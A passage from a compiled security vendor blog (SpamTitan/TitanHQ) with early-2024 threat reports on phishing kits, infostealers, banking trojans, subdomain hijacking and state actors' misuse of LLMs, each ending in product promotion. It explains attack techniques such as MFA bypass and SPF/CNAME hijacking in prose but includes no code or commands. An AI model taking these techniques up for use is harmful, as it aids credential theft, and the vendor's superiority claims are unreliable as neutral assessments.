its\r\noperational hubs in Abuja, Nigeria; Cape Town, South Africa; Nairobi, Kenya; and Tunis, Tunisia. Equinox\r\nTechnologies helps businesses of all sizes expand and invest seamlessly across international borders through the\r\nprovision of business-critical administrative, security, and compliance support. The services provided include\r\nenterprise mobility management, software engineering, IT operations, digital services, and cybersecurity.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 92 of 136\n\nThe strategic alliance with TitanHQ will see Equinox Technologies act as a value-added distributor, packaging\r\nTitanHQ solutions with other products and services to meet its clients’ cybersecurity and compliance needs and\r\nbetter protect them from the rapidly evolving landscape of cyber threats. Under the new agreement, Equinox\r\nTechnologies will become the exclusive distributor of TitanHQ solutions in Africa, further expanding TitanHQ’s\r\nglobal footprint.\r\nEquinox Technologies will help its clients improve email security by offering TitanHQ’s cloud-based anti-spam\r\nservice (SpamTitan), phishing protection solution (PhishTitan), and email encryption solution (EncryptTitan),\r\nprotection from web-based threats through TitanHQ’s DNS filtering solution (WebTitan), threats that target\r\nemployees with TitanHQ’s security awareness training and phishing simulation platform (SafeTitan); and help\r\nthem meet their email retention and compliance obligations through TitanHQ’s email archiving solution\r\n(ArcTitan).\r\n“This collaboration signifies Equinox Technologies’ commitment to fortifying its cybersecurity offerings,” said\r\nTitanHQ CEO, Ronan Kavanagh. “Together, Equinox Technologies and TitanHQ will be able to shield African\r\ncompanies from the constantly evolving landscape of cyber threats through a comprehensive suite of security\r\nsolutions.”\r\nFacebook Messages Used to Distribute Snake Infostealer Malware\r\nby G Hunt | March 20, 2024 | Phishing \u0026 Email Spam\r\nMalware is often distributed via email or websites linked in emails, and advanced email security solutions such as\r\nSpamTitan Plus can protect you by preventing the messages from reaching inboxes. SpamTitan Plus uses dual\r\nantivirus engines to detect known malware and sandboxing to identify and block zero-day malware threats.\r\nSpamTitan Plus also rewrites URLs, uses predictive analysis to identify suspicious URLs, and blocks those URLs\r\nto prevent users from reaching the websites where malware is hosted. To get around email security solutions,\r\ncybercriminals use other methods for making initial contact with end users, and instant messaging services are a\r\npopular alternative.\r\nResearchers at Cybereason recently identified a malware distribution campaign that distributes a Python-based\r\ninformation stealer via Facebook messages. The infostealer has been dubbed Snake and has been developed to\r\nsteal credentials and other sensitive information. The campaign was first detected in the summer of 2023 and\r\ntargets businesses. The messages use lures such as complaints and offers of products from suppliers to trick users\r\ninto visiting a link and downloading a file. As is common with malware distribution campaigns, the threat actor\r\nuses legitimate public repositories for hosting the malicious file, such as GitHub and GitLab. The file to which the\r\nuser is directed is a compressed file and, if extracted, will lead to the execution of a first-stage downloader. The\r\nfirst-stage downloader fetches a second compressed file,  extracts the contents, and executes a second downloader,\r\nwhich delivers the Python infostealer.\r\nThree different variants of the infostealer have been identified, all of which gain persistence via the StartUp folder.\r\nEach variant targets web browsers, including Brave, Chromium, Chrome, Edge, Firefox, Opera, and the\r\nVietnamese CoC CoC browser, with the latter and other evidence suggesting that the campaign is being conducted\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 93 of 136\n\nby a Vietnamese threat actor. All three variants also target Facebook cookies. The gathered data and cookies are\r\nexfiltrated in a .zip file via the Telegram Bot API or Discord.\r\nOne way of blocking these attacks is to use a web filter to block access to instant messaging services that are not\r\nrequired for business purposes, including Facebook Messenger. With WebTitan it is possible to block Messenger\r\nwithout blocking the Facebook site, and controls can be implemented for different users to allow users with\r\nresponsibility for updating the organization’s social media sites to access the platforms while preventing access for\r\nother users. It is also a good practice to use WebTitan to block downloads of executable files from the Internet to\r\nprevent malware delivery and stop employees from downloading and installing unauthorized software.\r\nDropbox Abused in Novel Phishing Attack to Obtain M365 Credentials\r\nby G Hunt | March 14, 2024 | Phishing \u0026 Email Spam\r\nThe file hosting service Dropbox is being abused in a novel phishing campaign that exploits trust in the platform\r\nto harvest Microsoft 365 credentials. The campaign targeted 16 employees of an organization who received an\r\nemail from the no-reply[@]dropbox.com account, a legitimate email account that is used by Dropbox. The emails\r\nincluded a link that directed the recipients to a Dropbox-hosted PDF file, which was named to appear as if it had\r\nbeen created by one of the organization’s partners. If the PDF file was opened, the user would see a link that\r\ndirects them to an unrelated domain – mmv-security[.]top. One of the employees was then sent a follow-up email\r\nreminding them to open the PDF file that was sent in the first email. They did, and they were directed to a\r\nphishing page that spoofed the Microsoft 365 login page. A couple of days later, suspicious logins were detected\r\nin the user’s Microsoft 365 account from unknown IP addresses, which were investigated and found to be\r\nassociated with ExpressVPN, indicating the attacker was using the VPN to access the account and mask their IP\r\naddress.\r\nMultifactor authentication was correctly configured on the account but this appears to have been bypassed, with\r\nthe logins appearing to use a valid MFA token. After capturing credentials, the employee is thought to have\r\nunknowingly approved the MFA authentication request which allowed the account to be compromised. The\r\nattacker gained access to the user’s email account and set up a new rule that moved emails from the organization’s\r\naccounts team to the Conversation History folder to hide the malicious use of the mailbox. Emails were also sent\r\nfrom the account to the accounts team in an apparent attempt to compromise their accounts.\r\nPhishing attacks are becoming increasingly sophisticated and much more difficult for end users to identify.\r\nSecurity awareness training programs often teach users about the red flags in emails they should look out for, such\r\nas unsolicited emails from unknown senders, links to unusual domains, and to be wary of any requests that have\r\nurgency and carry a threat should no action be taken. Impersonation is common in phishing attacks, but in this\r\ncase, the impersonation went further with the emails sent from a valid and trusted account. That means that the\r\nemail is more likely to be trusted and unlikely to be blocked by email security solutions, especially as the emails\r\ninclude a link to a file hosted on a trusted platform. This was also a staged attack, with follow-up emails sent,\r\nwhich in this case proved effective even though the second email was delivered to the junk email folder. The login\r\npage to which the user was directed looked exactly the same as the genuine login prompt for Microsoft 365, aside\r\nfrom the domain on which it was hosted.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 94 of 136\n\nMany businesses have configured multifactor authentication on their Microsoft 365 accounts, but as this attack\r\ndemonstrates, MFA can be bypassed. The sophisticated nature of phishing attacks such as this demonstrates how\r\nimportant it is for businesses to have advanced defenses against phishing. TitanHQ’s anti-phishing solutions use\r\nAI and a large language model (LLM) with proprietary threat intelligence currently not found in any other anti-phishing and anti-spam software solutions on the market. All emails are scanned – internal and external – for\r\nphrases and keywords that are unusual and could indicate malicious intent. All URLs are checked against various\r\nthreat intelligence feeds to identify malicious URLs, and URLs are rewritten to show their true destination. The\r\nsolution also learns from feedback provided by users and detection improves further over time. The curated and\r\nunique email threat intelligence data is unmatched in visibility, coverage, and accuracy, and TitanHQ’s anti-spam\r\nand email security solutions feature sandboxing, where attachments are subjected to deep analysis in addition to\r\nsignature-based anti-virus scanning. When a malicious email is detected, all other instances are removed from the\r\nentire M365 tenant.\r\nIf you want to improve your defenses against sophisticated phishing attacks give the TitanHQ team a call. If you\r\nare a Managed Service Provider looking for an easy-to-use solution to protect your clients from phishing and\r\nmalware, look no further than TitanHQ. All solutions have been developed from the ground up to meet the needs\r\nof MSPs to better protect their customers from spam, phishing, malware, and BEC attacks.\r\nCryptoChameleon Phishing Kit Targets FCC Employees and Cryptocurrency\r\nPlatform Users\r\nby G Hunt | March 5, 2024 | Phishing \u0026 Email Spam\r\nA new phishing kit has been identified that is being used to target employees of the U.S. Federal Communications\r\nCommission (FCC) and the cryptocurrency platforms Binance and Coinbase, as well as users of cryptocurrency\r\nplatforms such as Binance, Coinbase, Caleb \u0026 Brown, Gemini, Kraken, ShakePay, and Trezor.\r\nA phishing kit is a set of tools and templates that allows threat actors to conduct effective phishing campaigns.\r\nThese kits are marketed on the dark web to hackers and allow them to conduct phishing campaigns without having\r\nto invest time and money into setting up their own infrastructure. Phishing kits range from simple kits that provide\r\nphishing templates and cloned login pages, to more advanced kits that are capable of adversary-in-the-middle\r\nattacks that can defeat multifactor authentication. These kits significantly lower the entry barrier for conducting\r\nphishing campaigns as they require little technical expertise. Pay a relatively small fee and sophisticated phishing\r\ncampaigns can be conducted in a matter of minutes.\r\nThe new phishing kit is called CryptoChameleon and allows users to create carbon copies of the single sign-on\r\n(SSO) pages that are used by the targeted businesses. Employees are used to authenticating through a single\r\nsolution, through which they authenticate with many business applications. The kit also includes templates for\r\nphishing pages to harvest the credentials of cryptocurrency platform users and employees, including pages that\r\nimpersonate Okta, iCloud, Gmail, Outlook, Yahoo, AOL, and Twitter.\r\nThe phishing operation was discovered by researchers at Lookout and more than 100 high-value victims of this\r\ncampaign have been identified to date. Threat actors using the kit have been contacting users via SMS, email, and\r\nphone calls to trick them into visiting a malicious site where their credentials are harvested. Users are redirected to\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 95 of 136\n\na phishing site but before the content is displayed, they are required to pass an hCAPTCHA check. This helps with\r\nthe credibility of the campaign, but most importantly it prevents automated analysis tools and security solutions\r\nfrom identifying the phishing site.\r\nIn the campaign targeting FCC employees, after passing the hCAPTCHA check, the user is presented with a login\r\npage that is a carbon copy of the FCC Okta page. The domain on which the page is hosted – fcc-okta[.com] –\r\ndiffers only slightly (1 character) from the legitimate FCC Okta login page. Login credentials alone are not\r\nnormally enough to gain access to accounts as many are now protected by MFA. The captured login credentials\r\nare used to log in to the real account in real time, and the victim is then directed to the appropriate page where\r\nadditional information is collected to pass the MFA checks. This could be a page that requests their SMS-based\r\ntoken or the MFA token from their authenticator app. Once the MFA check has been passed and the account has\r\nbeen accessed by the threat actor, the victim can be redirected anywhere. For instance, they could be shown a\r\nmessage that the login has been unsuccessful and they must try again later.\r\nTo target cryptocurrency platform users, messages are sent about security alerts such as warnings that their\r\naccount has been accessed. These messages are likely to attract a rapid response due to the risk of substantial\r\nfinancial losses. In the campaign targeting Coinbase, the user is told they can secure their account and if they log\r\nin they can terminate suspicious devices. A similar process is used to obtain the credentials and MFA codes needed\r\nto access the account as the FCC campaign.\r\nThis is just one of many phishing kits offered on the dark web. Protecting against these phishing kits requires a\r\ncombination of measures including an advanced spam filter, web filter, and security awareness training. For\r\nfurther information on cybersecurity solutions capable of combatting advanced phishing attempts, give the\r\nTitanHQ team a call.\r\nState Sponsored Hackers and Cybercriminal Groups Are Using AI to Improve\r\nTheir Campaigns\r\nby G Hunt | February 29, 2024 | Network Security\r\nThere is growing evidence that cybercriminal groups are leveraging artificial intelligence in their cyberattacks,\r\nspecifically large language models (LLMs) such as ChatGPT, despite the restrictions OpenAI has put in place.\r\nThere are also LLMs that are being marketed directly to cybercriminals such as WormGPT. WormGPT is a\r\nblackhat AI tool that has been specifically developed for malicious uses and can perform similar tasks to ChatGPT\r\nbut without any ethical restrictions on uses. The tool can be used for generating convincing phishing and business\r\nemail compromise emails in perfect English, free from the spelling mistakes and grammatical errors that are often\r\nfound in these emails.\r\nIt is not only cybercriminal groups that are using these AI tools. Nation state hacking groups are exploring how\r\nthese tools can help them gain initial access to targeted networks. Recently published research from Microsoft and\r\nOpenAI confirmed that threat actors from Russia, China, Iran, and North Korea and using AI tools to support their\r\nmalicious activities. Microsoft and OpenAI found the most common uses of LLMs by nation state actors were for\r\ntranslation, finding coding errors, running basic coding tasks, and querying open-source information. While it\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 96 of 136\n\ndoes not appear that they are using LLMs to generate new methods of attack or write new malware variants, these\r\ntools are being used to improve and accelerate many aspects of their campaigns.\r\nThe threat actor tracked by Microsoft as Crimson Sandstorm, which is affiliated with the Islamic Revolutionary\r\nGuard Corps (IRGC), a multi-service primary branch of the Iranian Armed Forces, has been using LLMs to\r\nimprove its phishing campaigns to gain initial access to victims’ networks. Microsoft and OpenAI also report that\r\nthe hacking group has been using LLMs to enhance its scripting techniques to help them evade detection. The\r\nNorth Korean APT group, Emerald Sleet, is well known for conducting spear phishing and social engineering\r\ncampaigns and is using LLMs to assist with researching think tanks and key individuals that can be impersonated\r\nin its spear phishing campaigns. Threat groups linked to the People’s Republic of China such as Charcoal Typhoon\r\nand Salmon Typhoon have been using LLMs to obtain information on high-profile individuals, regional\r\ngeopolitics, US influence, and internal affairs and for generating content to socially engineer targets. OpenAI says\r\nit has terminated the accounts of five malicious state actors and has worked with Microsoft to disrupt their\r\nactivities, and OpenAI and Microsoft have been sharing data with other AI service providers to allow them to take\r\naction to prevent malicious uses of their tools.\r\nIt should come as no surprise that cybercriminals and nation state actors are using AI to improve productivity and\r\nthe effectiveness of their campaigns and are probing the capabilities of AI-based tools, and while this is a cause of\r\nconcern, there are steps that businesses can take to avoid falling victim to AI-assisted attacks. The best way to\r\ncombat AI-assisted attacks is to leverage AI for defensive purposes. SpamTitan has AI and machine learning\r\ncapabilities that can detect zero day and AI-assisted phishing, spear phishing, and business email compromise\r\nattacks and better defend against AI-0assisted email campaigns.\r\nWith fewer spelling mistakes and grammatical errors in phishing emails, businesses need to ensure they provide\r\ntheir workforce with comprehensive training to help employees recognize email and web-based attacks. The\r\nSafeTitan security awareness training and phishing simulation platform is an ideal choice for conducting training\r\nand phishing simulations and improves resilience to a range of security threats. TitanHQ’s data shows\r\nsusceptibility to phishing attacks can be reduced by up to 80% through SafeTitan training and phishing\r\nsimulations. Businesses should also ensure that all accounts are protected with multi-factor authentication, given\r\nthe quality of the phishing content that can be generated by AI tools, and ensure that cybersecurity best practices\r\nare followed, and cybersecurity frameworks are adopted. The most important advice that we can give is to take\r\naction now and proactively improve your defenses, as malicious uses of AI are only likely to increase.\r\nPhishing-as-a-Service Poses a Serious Threat to Businesses\r\nby G Hunt | February 28, 2024 | Phishing \u0026 Email Spam\r\nCybercriminals are increasingly offering services that make it easy for anyone to conduct an attack. Skilled\r\nmalware developers can concentrate on writing their malware and making it available for others to use for a fee,\r\nransomware-as-a-service allows hackers who are skilled at breaching networks to conduct lucrative ransomware\r\nattacks without having to develop encryptors and pay for the infrastructure to their support attacks, and phishing-as-a-service provides a platform for conducting attacks to steal credentials and access accounts. These services\r\nbenefit all parties and allow even more attacks to be conducted.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 97 of 136\n\nPhishing campaigns may appear simple, but they require a lot of time and skill to set up. Stephanie Carruthers,\r\nwho leads an IBM X-Force phishing research project, said it takes her team about 16 hours to craft a phishing\r\nemail, not including the time it takes to set up all the necessary infrastructure to send the email and steal\r\ncredentials. Setting up the infrastructure is time-consuming and costly, and many businesses now have multi-factor authentication (MFA) to thwart attacks.\r\nWith phishing-as-a-service (PhaaS), anyone who wants to run a phishing campaign can simply pay a subscription\r\nand will be provided with all the tools they need to conduct attacks. They do not need to craft the phishing emails,\r\nthey just need to set a few parameters and provide the email addresses for the campaign. PhaaS makes conducting\r\nsophisticated attacks simple and significantly lowers the bar for conducting campaigns.\r\nTake LabHost, for example, a PhaaS platform that recently introduced functionality for targeting financial\r\ninstitutions and banks in North America and Canada. Since this new functionality was included in the first half of\r\n2023, attacks have increased considerably. A monthly subscription is paid, and customers are provided with a\r\nturnkey phishing kit, which includes the infrastructure for hosting phishing pages, a content generator for creating\r\nphishing emails, and a portal for monitoring the progress of campaigns. Customers can choose to pay $179 per\r\nmonth to target Canadian banks, $249 per month to expand the targets to North America, and $300 a month to also\r\ntarget 70 financial institutions worldwide. Customers are also provided with phishing pages for collecting\r\ncredentials or a variety of other companies, including music streaming sites, delivery services, and\r\ntelecommunications companies.\r\nImportant to the success of any campaign is the ability to defeat multi-factor authentication. The LabHost phishing\r\nkit incorporates LabRat, a phishing tool that allows real-time management of phishing campaigns and allows\r\nadversary-in-the-middle attacks where two-factor authentication codes and cookies are obtained in addition to\r\nusernames and passwords. That means the additional security processes on the online portals of banks can be\r\ncircumvented. The platform also allows SMS-based attacks to be conducted.\r\nPhaaS allows unskilled hackers to conduct effective campaigns that they otherwise would not be able to conduct.\r\nFurther, with the use of AI to craft convincing phishing emails, phishing emails are becoming much harder for\r\nhumans and security solutions to detect, and even MFA and other security measures can be bypassed.\r\nDefending against attacks is therefore challenging, and there is no single cybersecurity solution that will block all\r\nattacks. What is needed is a defense-in-depth approach, with multiple, overlapping layers of protection.\r\nCybersecurity solutions are required to block the phishing emails. SpamTitan is an advanced email security\r\nsolution with AI and machine learning capabilities for identifying novel phishing threats. SpamTitan blocks\r\nknown malware through AV controls and unknown malware through sandboxing. The message sandboxing feature\r\nuses pattern filtering to identify malware from its behavior, which allows zero-day malware threats to be identified\r\nand blocked. Malware sandboxing is vital for email security since so many novel malware threats are now being\r\nreleased. SpamTitan is also capable of identifying even machine-crafted phishing content.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 98 of 136\n\nEnd user training is also vital, as no email security solution will block all email threats without also blocking an\r\nunacceptable number of genuine emails. End users should be trained on how to identify, avoid, and report\r\nphishing emails. The SafeTitan security awareness training platform makes security awareness training simple,\r\nand the constantly updated content allows businesses to respond to changing phishing tactics and conduct phishing\r\nsimulations on the workforce to reinforce training and identify knowledge gaps.\r\nGiven the number of phishing kits that are capable of bypassing multi-factor authentication, simply enabling MFA\r\non accounts is no longer sufficient to protect against unauthorized access. Phishing-resistant multi-factor\r\nauthentication is required – FIDO/ WebAuthn authentication or Public key infrastructure (PKI)-based MFA – to\r\nblock adversary-in-the-middle attacks that can be conducted through PhaaS.\r\nIf you want to improve your defenses against phishing and other cybercriminal services, give the TitanHQ team a\r\ncall to discuss your options.\r\nMassive Spamming Campaign Uses Thousands of Hijacked Subdomains\r\nby G Hunt | February 26, 2024 | Phishing \u0026 Email Spam\r\nA massive email spamming campaign has been detected that is generating up to 5 million emails per day that\r\ndirect recipients of the emails to a variety of scam sites. The emails are sent through hijacked subdomains and\r\ndomains of trusted companies, which help these emails evade email security solutions and be delivered to inboxes.\r\nCompanies that have had domains and subdomains hijacked include eBay, CBS, McAfee, MSN, and Symantec.\r\nEmail security solutions perform a range of checks on inbound emails, including reputation checks on the senders\r\nof emails. If a domain is trusted and has not previously been associated with spamming, these checks – using\r\nSPK, DKIM, and DMARC – are likely to be passed, resulting in the emails being delivered to end users. The use\r\nof these legitimate domains also makes it harder for end users to determine whether the messages are genuine.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 99 of 136\n\nSecurity awareness training programs often teach end users to check the sender of the email and make sure that it\r\nmatches the company being spoofed. If the domain is eBay, and the email uses eBay branding, end users are likely\r\nto think that the communication is genuine. These emails include links to websites that generate fraudulent ad\r\nrevenue, and often several redirects occur before the user lands on the destination scam or phishing site.\r\nThe ‘SubdoMailing’ campaign was identified by researchers at Guardio Labs, with the legitimate domains\r\ntypically hijacked through SPF record exploitation or CNAME hijacking. The former involves searching for\r\ndomains that use the ‘include’ configuration option that points to external domains that are no longer registered.\r\nThose domains are then registered by the threat actor and the SPF records are changed to authorize the use of their\r\nown email servers. When those servers are used to send emails, they appear to have been sent by the targeted\r\nbrand, such as eBay.\r\nWith CNAME hijacking, scans are conducted to identify subdomains of reputable brands with CNAME records\r\nthat point to external domains that are no longer registered. The threat actor then registers those domains, SPF\r\nrecords are injected, and emails can be sent from their email servers to show that they have been sent by a\r\nlegitimate company. By hijacking huge numbers of domains and subdomains, the threat actor is able to conduct\r\nmassive spamming campaigns. The researchers identified more than 13,000 subdomains and more than 8,000\r\ndomains that were used in the campaign, with more than 1000 residential lines used and almost 22,000 unique\r\nIPs. The researchers developed a tool to allow domain owners to check whether their own domains have been\r\nhijacked and take action to stop that abuse. An advanced spam filter is required to block the messages that are set\r\nfrom these hijacked domains and subdomains – one that does not rely on SPF, DKIM, and DMARC for\r\nidentifying spam emails.\r\nTravel Companies Impersonated in Malware Distribution Campaign\r\nby G Hunt | February 26, 2024 | Phishing \u0026 Email Spam\r\nCybercriminals are constantly devising new email campaigns for distributing malware. These campaigns usually\r\nimpersonate a trusted entity and advise the email recipient about a pressing issue that requires immediate\r\nattention. The emails often have an attached file that must be opened to find out further information about the\r\nissue detailed in the email.\r\nOne recently detected campaign impersonates travel service providers such as booking.com and advises the\r\nrecipient about a problem with a recent booking. One of the intercepted emails explains that an error has occurred\r\nwith a booking that has resulted in a double charge to the user’s credit card which requires immediate attention.\r\nThe email has a PDF attachment which needs to be opened for further information. PDF files are increasingly\r\nbeing used in email campaigns for distributing malware. The PDF files often contain a script that generates an\r\nerror message when the file is opened that tells the user that the content of the file cannot be displayed, and they\r\nare provided with an option to download the file.\r\nIn this campaign, the PDF file contains a script that generates a fake popup message. If clicked, a connection is\r\nmade to a malicious URL and a download of an obfuscated JavaScript file is initiated. The script downloads the\r\nnext stage PowerShell payload, and on execution, drops a malicious DLL file on the device. The DLL file searches\r\nfor certain critical system processes and attempts to forcibly stop them, makes changes to the registry that affect\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 100 of 136\n\nthe Windows Antimalware Scan Interface (AMSI) and ensures that the malware is executed without being\r\ndetected by security solutions. An analysis of the DLL file by researchers at Forcepoint shows the file is from the\r\nAgent Tesla malware family. Agent Tesla is a remote access trojan (RAT) that first appeared in 2014 and grew in\r\npopularity during the COVID-19 pandemic. Agent Tesla is provided under the malware-as-a-service model and is\r\npopular with initial access brokers, who specialize in gaining access to devices and accounts and then sell that\r\naccess to other cybercriminals such as ransomware gangs.\r\nAgent Tesla allows commands to be run on compromised systems and is capable of stealing sensitive information,\r\nsuch as login credentials stored in browsers. The malware can also take screenshots, log keystrokes, and perform\r\nother malicious actions. The malware uses multiple layers of obfuscation to ensure it is not detected by antivirus\r\nsolutions. The malware is commonly used to gain initial access to business networks, primarily through phishing\r\ncampaigns. In this campaign, by impersonating a popular travel service company there is a reasonable chance that\r\nthe user may have used the service in the past or have a current booking and will therefore open the email.\r\nHowever, since the emails reference a charge to a credit card, that may be sufficient to get the user to open the\r\nattachment.\r\nTo protect against this and other malware distribution campaigns, businesses should ensure that they protect all\r\nendpoints with email security and antivirus solutions that are capable of behavioral analysis of files, as Agent\r\nTesla and many other popular malware variants use obfuscation to bypass signature-based security solutions. Web\r\nfiltering solutions provide added protection as they block connections to the malicious URLs that host malware\r\nand they can be configured to block downloads of executable files from the Internet. It is also important to provide\r\nsecurity awareness training to the workforce to raise awareness of cyber threats and conduct phishing simulations\r\nto test the effectiveness of training.\r\nTitanHQ offers a range of cybersecurity solutions for businesses and managed service providers to help them\r\ndefend against cyber threats delivered via email and the Internet, including spam filtering with email sandboxing,\r\nweb filtering, and security awareness training. Give the team a call today to find out more about improving your\r\ndefenses against phishing and malware. All TitanHQ solutions are available on a free trial to allow you to test the\r\nproducts and see for yourself the difference they make.\r\nBusinesses Targeted with Phishing Emails Sent Via SendGrid\r\nby G Hunt | February 23, 2024 | Email Scams\r\nSmall- and medium-sized businesses are being targeted in a phishing campaign that leverages the email service\r\nprovider (ESP) SendGrid. SendGrid is a legitimate and well-known company that provides a customer\r\ncommunication platform for transactional and marketing email. SendGrid customer accounts are targeted to gain\r\naccess to company mailing lists which can be used for a variety of email campaigns, such as phishing, spamming,\r\nand scams. In this campaign, the phishers compromise companies’ SendGrid accounts and use the ESP itself to\r\nsend phishing emails. Emails sent through the SendGrid platform are likely to be trusted by email security\r\nsolutions, especially as the compromised accounts will have been used to send communications in the past.\r\nSendGrid may even be whitelisted to ensure that the emails are always delivered to inboxes. SendGrid emails are\r\nalso likely to be trusted by end users.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 101 of 136\n\nIn this campaign, the emails use a security-themed lure and inform the recipients that they need to set up 2-factor\r\nauthentication – a perfectly reasonable request since 2-FA will better protect accounts against unauthorized access.\r\nThe users are provided with a link that directs them to a malicious website that spoofs the SendGrid login, and if\r\ncredentials are entered, they are harvested by the scammer. The emails were routinely delivered to inboxes and\r\nevaded email security solutions because the SendGrid was trusted.\r\nSendGrid performs stringent checks on new accounts so it is difficult for malicious actors to use SendGrid\r\ndirectly, instead they compromise business SendGrid accounts, often through phishing attacks. Twilio SendGrid\r\ndetected the malicious activity linked to customer accounts that were being used for phishing, and its fraud,\r\ncompliance, and cyber security teams immediately shut down accounts. To better protect SendGrid accounts, users\r\nare advised to log in to their account and set up 2-factor authentication to prevent compromised credentials from\r\ngranting access to user accounts.\r\nThe campaign demonstrates that even emails from reliable sources may not be what they seem. Many companies\r\nprovide security awareness training to their employees that teaches cybersecurity best practices and trains\r\nemployees on how to recognize and avoid phishing. It is important to include these types of emails in training\r\nmaterial, as ESPs are being increasingly targeted by cybercriminals due to the effectiveness of campaigns run\r\nthrough an ESP.\r\nWith SafeTitan, keeping employees up to date on the latest tactics used by phishers and other cybercriminals is\r\neasy. The training content is regularly updated with new phishing templates based on real-world attacks and the\r\nlatest phishing trends, and phishing simulations can be conducted on employees to test how they respond to\r\nphishing attempts outside of the training environment. SafeTitan is the only security awareness training platform\r\nthat delivers targeted training automatically in response to bad security practices by employees, ensuring training\r\nis provided at the moment when it is most likely to be taken on board.\r\nMassive Phishing Campaign Leverages Google Cloud Run to Deliver Banking\r\nTrojans\r\nby G Hunt | February 22, 2024 | Phishing \u0026 Email Spam\r\nA massive malware distribution campaign has been detected that uses phishing emails for initial contact with\r\nbusinesses and Google Cloud Run for hosting the malware. A variety of banking trojans are being distributed\r\nincluding Astaroth, Mekotio, and Ousaban. The campaign primarily targets countries in Latin America, and as\r\nsuch the majority of the phishing emails are in Spanish, but Italian versions have also been detected and there are\r\nindications that the campaign is spreading to other regions including Europe and North America.\r\nThe phishing emails used in this campaign appear to be legitimate invoices, statements, and communications from\r\ngovernment and tax agencies and include a link that the recipient must click to view the attached invoice,\r\nstatement, or demand. The link directs the user to services on Google Cloud Run, which is a popular service for\r\nhosting frontend and backend services and deploying websites and applications without having to manage\r\ninfrastructure. Google Cloud Run has been used for hosting malware throughout 2023 but there was a massive\r\nspike in activity that started in September 2023 and has continued through January and February.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 102 of 136\n\nOver the past few months, Google’s service has been proving popular with cybercriminals for hosting malware as\r\nit is both cost-effective and is generally not blocked by security solutions. If a user clicks the email link, an MSI\r\nfile is downloaded onto their device. MSI files are executable files, which in this case include embedded\r\nJavaScript that downloads additional files and delivers one or more banking trojans.\r\nThe banking trojans achieve persistence through LNK files in the startup folder that execute a PowerShell\r\ncommand on boot that runs the infection script. The banking trojans are capable of keylogging, clipboard\r\nmonitoring, screenshots, credential theft, and traffic manipulation to direct users to cloned websites of financial\r\ninstitutions to capture banking credentials. The Astaroth banking trojan alone targets more than 300 financial\r\ninstitutions as well as cryptocurrency exchanges.\r\nTo protect against this and other malware distribution campaigns, businesses need to adopt a defense-in-depth\r\napproach and should implement multiple layers of protection. The first line of defense is a spam filter or email\r\nsecurity solution to block the initial phishing emails. SpamTitan Plus is a leading-edge anti-spam service that\r\nprovides maximum protection against malicious emails. The solution has better coverage, faster phishing link\r\ndetections, and the lowest false positive rate of any product, which makes it the best spam filter for businesses and\r\nan ideal MSP spam filtering solution In addition to including all leading phishing feeds to ensure the fastest\r\npossible detection of new phishing threats, SpamTitan Plus uses predictive analysis to identify suspicious URLs\r\nthat have not yet been detected as malicious.\r\nA web filter, such as WebTitan, can be used to control access to the Internet. For example, blocks can be placed on\r\nwebsites and certain categories of websites down to the user level, the solution prevents access to all known\r\nmalicious URLs, and can be configured to block file downloads from the Internet, such as MSI files and other\r\nexecutable files that are often used for malware delivery.\r\nCybercriminals often host malware on legitimate hosting platforms which are usually trusted by security solutions,\r\nwhich means malicious emails may be delivered to end users. It is therefore important to provide security\r\nawareness training for the workforce. Security awareness training raises awareness of the threats that employees\r\nare likely to encounter and teaches them security best practices to help them identify, avoid, and report cyber\r\nthreats. Combined with phishing simulations, it is possible to greatly reduce susceptibility to phishing and\r\nmalspam emails. Data from companies that use the SafeTitan security awareness training platform and phishing\r\nsimulator shows susceptibility to phishing threats can be reduced by up to 80%.\r\nIf you are looking to improve your defenses against phishing and malware, give the TitanHQ team a call to find\r\nout more about these products and to help get you set up for a free trial to put these solutions to the test in your\r\nown environment.\r\nMalware Increasingly Distributed via Emailed PDF Files\r\nby G Hunt | February 20, 2024 | Phishing \u0026 Email Spam\r\nThere has been a marked increase in email campaigns using malicious PDF files to distribute malware, rather than\r\nthe typical uses of PDF files for obtaining sensitive information such as login credentials.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 103 of 136\n\nIncreased security measures implemented by Microsoft have made it harder for cybercriminals to use macros in\r\nOffice documents in their email campaigns, with PDF files a good alternative. Malicious links can be embedded in\r\nPDF files that drive victims to web pages where credentials are harvested. By using PDF files to house the links,\r\nthey are less likely to be blocked by email security solutions.\r\nOver the past few months, PDF files have been increasingly used to distribute malware. One of the currently\r\nactive campaigns uses malicious emailed PDF files to infect users with DarkGate malware. DarkGate malware is\r\noffered under the malware-as-a-service model and provides cybercriminals with backdoor access to infected\r\ndevices. In this campaign, emails are sent to targets that contain a PDF attachment that displays a fake image from\r\nMicrosoft OneDrive that suggests there was a problem connecting which has prevented the content from being\r\ndisplayed. The user is given the option to download the PDF file; however, the downloaded files will install\r\nDarkGate malware.\r\nIn this campaign, clicking the link does not directly lead to the malware download, instead, the click routes\r\nthrough an ad network, so the final destination cannot be identified by checking the link of the download button.\r\nFurther, since the ad network uses CAPTCHAs, the threat actors can make sure that the destination URL is not\r\nrevealed to email security solutions. If the CAPTCHA is passed, the user will be redirected to the malicious URL\r\nwhere they can download the file.  This is often a compressed file that contains a text file and a URL file, with the\r\nlatter downloading and running JavaScript code which executes a PowerShell command that downloads and\r\nexecutes the malicious payload.\r\nPDF files have been used in many other malware campaigns, including those that distribute the 